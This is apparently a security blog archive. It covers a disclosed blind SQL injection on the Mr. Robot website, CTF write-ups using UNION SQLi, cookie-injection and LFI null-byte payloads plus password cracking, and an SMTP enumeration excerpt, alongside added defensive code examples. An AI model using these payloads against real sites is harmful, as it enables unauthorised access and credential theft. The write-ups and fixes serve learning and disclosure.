Mr.Robot Blind SQL Injection Vulnerability

So the other day I saw this article http://thehackernews.com/2016/05/hacker-mr-robot-season2.html on TheHackerNews (and in Forbes) about how a hacker found an XSS vulnerability on the official website of the Mr. Robot TV series. Since I’m a big fan of the series I went and looked around a bit. I wasn’t expecting to find any vulnerabilities, but I had Burp running on the side. There was a section where you can subscribe with your email and “join and be a part of the revolution”, so I did, and I saw the request going to a page called “Usa_api.php”. I put in a single quote to see what would happen. The response came back with no errors; it just said “Invalid E-mail Address”. Then I tried “email=cc@cc.com’+and+’x’=’x” and it returned “Access Denied”, which got me thinking it might be vulnerable to blind SQLi.

So I did some tests.

A true condition returns Forbidden:

[screenshot: Screen Shot 2016-05-12 at 2.43.20 PM]

A false condition returns “Invalid E-mail Address”:

[screenshot: Screen Shot 2016-05-12 at 2.43.27 PM]

Since it was written in PHP my best guess was that it had a MySQL backend and was sitting behind a WAF. After a few attempts I felt it was time for SQLMap.
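What a boolean-based blind oracle looks like at the code level, as an added example that is not from the original post (the real Usa_api.php code is not on the page, so nothing here claims to be it): a constructed SQLite table stands in for the subscriber list, is_subscribed_vulnerable builds the query by string concatenation the way a vulnerable endpoint would, and is_subscribed_safe binds the email as a parameter. The table, column and function names are all assumptions made for the example.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the subscriber table behind the form."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE subscribers (email TEXT NOT NULL)")
    conn.executemany("INSERT INTO subscribers (email) VALUES (?)",
                     [("fan@example.com",), ("cc@cc.com",)])
    return conn


def is_subscribed_vulnerable(conn, email):
    """String concatenation: whatever the client sends becomes part of the SQL.
    Returns True/False for a well-formed query and None when the query breaks.
    Three distinguishable outcomes is exactly the signal a blind probe reads
    from 'Access Denied' vs 'Invalid E-mail Address'."""
    sql = "SELECT COUNT(*) FROM subscribers WHERE email = '" + email + "'"
    try:
        return conn.execute(sql).fetchone()[0] > 0
    except sqlite3.Error:
        return None


def is_subscribed_safe(conn, email):
    """Parameterised query: the email is bound as data and never parsed as SQL,
    so a quote or an appended 'and' clause is just an address that does not exist."""
    row = conn.execute("SELECT COUNT(*) FROM subscribers WHERE email = ?",
                       (email,)).fetchone()
    return row[0] > 0


def oracle_differs(conn, lookup):
    """True when a tautology and a contradiction appended to the same value give
    different answers, i.e. when the lookup leaks a boolean oracle."""
    true_case = lookup(conn, "cc@cc.com' and 'x'='x")
    false_case = lookup(conn, "cc@cc.com' and 'x'='y")
    return true_case != false_case


if __name__ == "__main__":
    db = make_db()
    print("concatenated query leaks an oracle:", oracle_differs(db, is_subscribed_vulnerable))
    print("parameterised query leaks an oracle:", oracle_differs(db, is_subscribed_safe))
```

The point of the example is that the “Invalid E-mail Address” validation on the real site did not stop the probe: the payload passed whatever check was in front of the query, so the fix has to be in how the query is built, not in the validation message.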

Since it returns 403 on a true condition, I passed --code=403 to make it easier for SQLMap.

[screenshot: Screen Shot 2016-05-13 at 12.51.09 PM]

and the DB it came up with was

[screenshot: Screen Shot 2016-05-13 at 3.50.17 PM]

I reported the vulnerability (2016-05-12) to “domain.admin@nbcuni.com”.

They responded and patched it (2016-05-14).

[screenshot: Screen Shot 2016-05-14 at 8.47.13 AM]

damo.clanteam.com Security Challenge VI [Writeup]

Alright, this one is a tricky one. It took me some time to figure it out. At first I spent about half an hour trying to figure out what was happening, but when I saw a register page I got a feeling it had something to do with cookie injection. So I started up Burp Suite and logged in. All I had was a “PHPSESSID”. I spent some time googling to see if there was anything up with PHPSESSID, but almost everything was a dead end. Then, when I was going through the Burp Suite history, I saw there were 2 deleted cookies when I was logging in.


Those seemed like something to be concerned about. After spending some time messing around, when I was logging in again I ticked “Remember me”, and then I saw those two cookie parameters were saved in the session.


Now both parameters seem to be base64-encoded (base64 is encoding, not encryption, so the values can be decoded and re-encoded by anyone holding the cookie). So I used Ruby to decode the base64:

root@bt:~# echo "require 'base64'; puts Base64.decode64('bnVrZTk5')" | ruby
nuke99

So it’s the obvious answer, my username ‘nuke99’. So I encoded the username “admin' or 'x'='x” and replaced the value of the “usernamesch6” parameter.

root@bt:~# echo "require 'base64'; puts Base64.encode64('admin\' or \'x\'=\'x')" | ruby
YWRtaW4nIG9yICd4Jz0neA==

And now I’m logged in as the Admin. Alright, now go to “members-only.php” and submit your name with the replaced Admin session.
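An added example (not part of the original write-up and not the challenge site's code) showing why a base64 cookie gives no protection and what a signed cookie changes: decode_challenge_cookie reproduces the decode step from the write-up, while issue_cookie and read_cookie are an assumed HMAC-SHA256 design in which any re-encoded username fails verification. The key and all function names are constructed for the example.

```python
import base64
import hashlib
import hmac

# Assumption: a secret that lives only on the server; constructed for this example.
SERVER_KEY = b"constructed-secret-key-rotate-me"


def decode_challenge_cookie(value):
    """What the challenge site effectively does: base64 is reversible encoding,
    so the decoded username is whatever the client chose to send."""
    return base64.b64decode(value).decode("utf-8")


def sign(body, key=SERVER_KEY):
    """HMAC-SHA256 over the encoded body, hex encoded."""
    return hmac.new(key, body.encode("ascii"), hashlib.sha256).hexdigest()


def issue_cookie(username, key=SERVER_KEY):
    """Cookie = base64(username) + '.' + HMAC(key, base64(username))."""
    body = base64.b64encode(username.encode("utf-8")).decode("ascii")
    return body + "." + sign(body, key)


def read_cookie(value, key=SERVER_KEY):
    """Return the username only if the tag verifies; None for a tampered,
    unsigned or malformed cookie. compare_digest avoids timing leaks."""
    body, sep, tag = value.rpartition(".")
    if not sep:
        return None
    if not hmac.compare_digest(tag, sign(body, key)):
        return None
    try:
        return base64.b64decode(body, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def swap_username(cookie, new_username):
    """Re-encode the body the way the write-up does, keeping the old tag."""
    _body, _sep, tag = cookie.rpartition(".")
    return base64.b64encode(new_username.encode("utf-8")).decode("ascii") + "." + tag
```

Signing stops the client from picking the username, which is the whole problem the challenge is built on. The query that the decoded username ends up in still has to use bound parameters, since the server must not treat the decoded value as SQL either.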


Ok now cya until the next challenge

damo.clanteam.com Security Challenge III [Writeup]

Alright, this one is easy. The challenge is on basic SQL injection. In the challenge application there is a SQL injection vulnerability in the member-info.php page. It’s a basic UNION-based SQL injection; from there I used sqlmap to spice things up.

vulnerable application URL is

http://damo.clanteam.com/sch3/member-info.php?id=1'+union+select+1,'nuke99',3,4,5+from+accounts--

So the passwords were hashed with SHA1. For that I used an online hash database to get the plaintext password.


And using “stanllone” as the username and “fire” as the password I logged into the members area.

That’s about it. See you soon guys.

damo.clanteam.com Security Challenge II [Writeup]

I just completed the second challenge of damo.clanteam.com. It was a real challenge to figure out what the vulnerability was. Anyhow, I’m not going to write up how I did it, because when I googled I couldn’t find a single person who had written a write-up for it. But I am going to give away a free tip.

Key file is in

http://damo.clanteam.com/sch2/admin_key.txt

Rest of the challenge is up to you😀

Have fun

damo.clanteam.com Security Challenge I [writeup]

Hey fellas, it’s been a while since the last post. Anyway, I saw this security challenge post on Twitter and thought of giving it a shot. So this is the write-up post for the first challenge. It’s pretty easy actually.

The challenge is to log in to the admin area, which is protected with .htpasswd. When we enter the challenge there is a link to see the people who completed it. The first thing I noticed was the page URL, which had index.php?page=halloffame. So my guess was either LFI or SQLi. With a simple single quote I was able to identify the vulnerability as LFI, because the error contained

Warning: include(halloffame'.php)

Also, since .php is appended by index.php, I guessed the code is something like

<?php
// the user-controlled page name goes straight into include(), with ".php" appended
include($_GET['page'].".php");
?>

Since there is a .php appended at the end, I used a null byte to cut it off. Also, since our target is the .htpasswd file, my first attempt was page=admin/.htpasswd% but it returned no file. So my second guess was page=admin/.htaccess%00


and it returned with

AuthType Basic
AuthName "Restricted Access!"
AuthUserFile /www/clanteam.com/d/a/m/damo/htdocs/hiddenfoldersch1/.htpasswd
Require user damo

So now we know the path to the .htpasswd file, and my next obvious step was to grab it.


Since the password was hashed, I used John to crack it:

john --wordlist=/usr/share/wordlist/rockyou.txt htpasswd

And after the cracking run succeeded I got the password as


Alright. See you soon guys.
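To make the include($_GET['page'].".php") guess from this write-up concrete, here is an added Python emulation (not the challenge's PHP and not from the original post) of how the page parameter resolves to a file on an older PHP build that cut paths at a NUL byte, next to an allow-list version that never lets the request name a file. The document root and the page names are assumptions made for the example.

```python
import posixpath
from urllib.parse import unquote

# Assumed document root of the challenge site; the real path is not on the page.
DOC_ROOT = "/var/www/site"
# Allow-list of pages index.php is meant to include (assumed names).
ALLOWED_PAGES = {"home", "halloffame", "login"}


def vulnerable_include_target(raw_page):
    """Emulates include($_GET['page'] . ".php") on a PHP build that truncated
    file names at a NUL byte. Returns the path PHP would try to open."""
    page = unquote(raw_page)            # the web server URL-decodes %00 to "\x00"
    path = page + ".php"
    nul = path.find("\x00")
    if nul != -1:
        path = path[:nul]               # everything after the NUL, including ".php", is dropped
    return posixpath.normpath(posixpath.join(DOC_ROOT, path))


def safe_include_target(raw_page):
    """Allow-list: the request picks a key, the server picks the file.
    Any value that is not a known page name is rejected outright."""
    page = unquote(raw_page)
    if page not in ALLOWED_PAGES:
        return None
    return posixpath.join(DOC_ROOT, page + ".php")


if __name__ == "__main__":
    for probe in ("halloffame", "halloffame'", "admin/.htaccess%00"):
        print(probe, "->", vulnerable_include_target(probe), "|", safe_include_target(probe))
```

In PHP itself the equivalent fix is to look the request up in a fixed array of page names (or to realpath() the result and check it still starts with the document root) rather than concatenating user input into include(). The single-quote probe from the write-up is also handled: it produces the odd halloffame'.php error in the emulation and a plain rejection in the allow-list version.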

Finished watching a movie online? Save the movie on your machine without downloading it

Alright. I’ve been watching TV series for the past couple of days non-stop. One of the things that kept bothering me was saving the file after finishing watching it online. So I thought I’d just write a script to do it for me. (I know this can be done in a couple of lines, but I added some functions which made the code bigger than I thought.)

The script can be found HERE (only tested on Ubuntu 12.10 with Chromium; feel free to change the code for your requirements).

It’s easy, but you need to have Ruby installed and the gem “readline”.

install Ruby on Ubuntu

sudo apt-get install ruby

Install the readline gem

sudo gem install readline

OK, now that we have Ruby and the readline gem installed, let’s go through the installation process:

cd /tmp
wget https://bitbucket.org/nuke_99/my-tools/raw/bd4dc807d8cfa4dac17425f84d8e69c8f447ee7b/flash_save.rb -O flash_save
chmod +x flash_save    # make the script executable
sudo mv flash_save /usr/local/bin/flash_save
cd ~/
flash_save

OK, to run flash_save just type “flash_save” and it will use your home folder and save the file there,
or you can give it a path:

flash_save /home/nuke/Video/big_bang_theory_S1_E01.flv
[+] saved in /home/nuke/Video/big_bang_theory_S1_E01.flv

And if you have multiple videos open in your browser it will give you a prompt to select which video to save. Use the “help” command to get the instructions. The “list” command gives the list of the loaded files, “play” will play the selected video so you can check it before saving, and finally “save” will save the video to the path given.

nuke@ihackmybox:~/$ flash_save /home/nuke/Videos/big_bang_theory_S3-E11.flv
[!] You have more than one flash player loaded in your browser
> help
help          : gets the list of the commands
list          : list the number of the vid file
play  : will play the selected file with the given player
save          : will save the file
quit          : exit the prompt
> list
24
32
> play 24
VLC media player 2.0.1 Twoflower (revision 2.0.1-0-gf432547)
[0x1f19108] main libvlc: Running vlc with the default interface. Use 'cvlc' to use vlc without interface.
> save 24
[+] saved in /home/nuke/Videos/big_bang_theory_S3-E11.flv
>
> quit

Using VLC as the media player

@@default_player = 'vlc'        # change this to the player you want to use
@@mem_id = 12624
@@files = []
@@path = Dir.home               # you can change the path to any place you want
@@file_name = "#{rand(6)}.flv"
@@list_item = []

Alright mates have fun

Metasploitable 2 FTP Exploitation (vsftpd backdoor) SESSION 1

Metasploitable 2 has been out for a while but I didn’t have a chance to use it. So I tried it today and thought of writing up what I’m trying on Metasploitable on the blog.

So I started with a simple nmap ping scan of the internal network to see which hosts are up at the moment:


Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-04 08:47 EST
Nmap scan report for 192.168.1.1
Host is up (0.00093s latency).
MAC Address: D8:6H:4C:EA:BB:B1 (Tp-link Technologies Co.)
Nmap scan report for 192.168.1.100
Host is up.
Nmap scan report for 192.168.1.101
Host is up (0.00022s latency).
MAC Address: 00:64:BE:8M:YD:12 (Sony)
Nmap scan report for 192.168.1.102
Host is up (0.0010s latency).
MAC Address: 08:00:27:A2:76:F2 (Cadmus Computer Systems)
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.48 seconds


Local File and Folder Transferring to Remote Servers through SSH (Hack Tip)

I have this habit of clearing my pentest data after finishing a job. What I used to do was upload all my pentest information to a remote server through FTP and clear the data on the local machine. But for the past couple of months I have started to use SSH for the file transfer, which is much easier than FTP.

To transfer a file to a remote server through SSH:

scp dump.sql nuke@67.22.xx.xx:pentest

dump.sql -> the file on the local machine to transfer

nuke@67.22.xx.xx -> auth user and remote server

pentest -> remote folder to upload

Uploading an entire folder over SSH is almost the same; you just need to add -r.

To transfer a folder to a remote server through SSH:

scp -r pentestdata nuke@67.22.xx.xx:pentest

pentestdata-> the local machine folder

nuke@67.22.xx.xx -> auth user and remote server

pentest -> remote folder to upload

guess this could be a useful tip for you too🙂

Penetration Testing Lab

SMTP is a service that can be found in most infrastructure penetration tests. This service can help the penetration tester to perform username enumeration via the EXPN and VRFY commands if these commands have not been disabled by the system administrator. There are a number of ways in which this enumeration through SMTP can be achieved, and they will be explained in this article.

The role of the EXPN command is to reveal the actual addresses of user aliases and email lists, and VRFY can confirm the existence of valid user names.

SMTP enumeration can be performed manually through utilities like telnet and netcat, or automatically via a variety of tools like Metasploit, nmap and smtp-user-enum. The following 2 screenshots show how we can enumerate users with the VRFY and RCPT commands using telnet.

Metasploit

The module that can perform user enumeration via SMTP in…
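From the defender's side, the VRFY, EXPN and RCPT probing described above leaves a trace in the mail server's log. The following is an added example (not from the Penetration Testing Lab post or from this blog) that scores SMTP command records per client IP and flags the ones that look like enumeration. The log lines are constructed in a simple key=value layout that is not any real MTA's format, so the regular expression would need adapting to Postfix, Exim or Sendmail logging; thresholds and function names are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample log (not a real MTA format): one client probing accounts,
# one client delivering a normal message.
SAMPLE_LOG = """\
2016-03-01T10:00:01 client=203.0.113.5 cmd=VRFY arg=root resp=252
2016-03-01T10:00:01 client=203.0.113.5 cmd=VRFY arg=admin resp=550
2016-03-01T10:00:02 client=203.0.113.5 cmd=VRFY arg=postmaster resp=252
2016-03-01T10:00:02 client=203.0.113.5 cmd=EXPN arg=staff resp=502
2016-03-01T10:00:03 client=203.0.113.5 cmd=VRFY arg=backup resp=550
2016-03-01T10:00:03 client=203.0.113.5 cmd=RCPT arg=test1@example.com resp=550
2016-03-01T10:00:04 client=203.0.113.5 cmd=RCPT arg=test2@example.com resp=550
2016-03-01T10:05:00 client=198.51.100.7 cmd=MAIL arg=alice@example.net resp=250
2016-03-01T10:05:00 client=198.51.100.7 cmd=RCPT arg=bob@example.com resp=250
2016-03-01T10:05:01 client=198.51.100.7 cmd=DATA arg= resp=354
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) client=(?P<ip>\S+) cmd=(?P<cmd>[A-Z]+) arg=(?P<arg>\S*) resp=(?P<code>\d{3})$"
)


def parse_log(text):
    """Yield one dict per well-formed line; lines that do not match are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()


def enumeration_candidates(text, threshold=5):
    """Per client IP, count VRFY/EXPN probes and RCPT commands rejected with a 5xx
    (unknown recipient). Return the clients whose total reaches the threshold."""
    counts = defaultdict(lambda: {"VRFY": 0, "EXPN": 0, "RCPT_rejected": 0})
    for rec in parse_log(text):
        if rec["cmd"] in ("VRFY", "EXPN"):
            counts[rec["ip"]][rec["cmd"]] += 1
        elif rec["cmd"] == "RCPT" and rec["code"].startswith("5"):
            counts[rec["ip"]]["RCPT_rejected"] += 1
    return {ip: c for ip, c in counts.items() if sum(c.values()) >= threshold}


if __name__ == "__main__":
    for ip, c in enumeration_candidates(SAMPLE_LOG).items():
        print(f"{ip}: {c}")
```

On Postfix, VRFY is turned off with disable_vrfy_command = yes in main.cf, and EXPN is not implemented there at all. Disabling them removes the cheap probes, but a RCPT TO that is rejected still tells the sender the address does not exist, which is why the counter also scores rejected recipients rather than only VRFY and EXPN.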
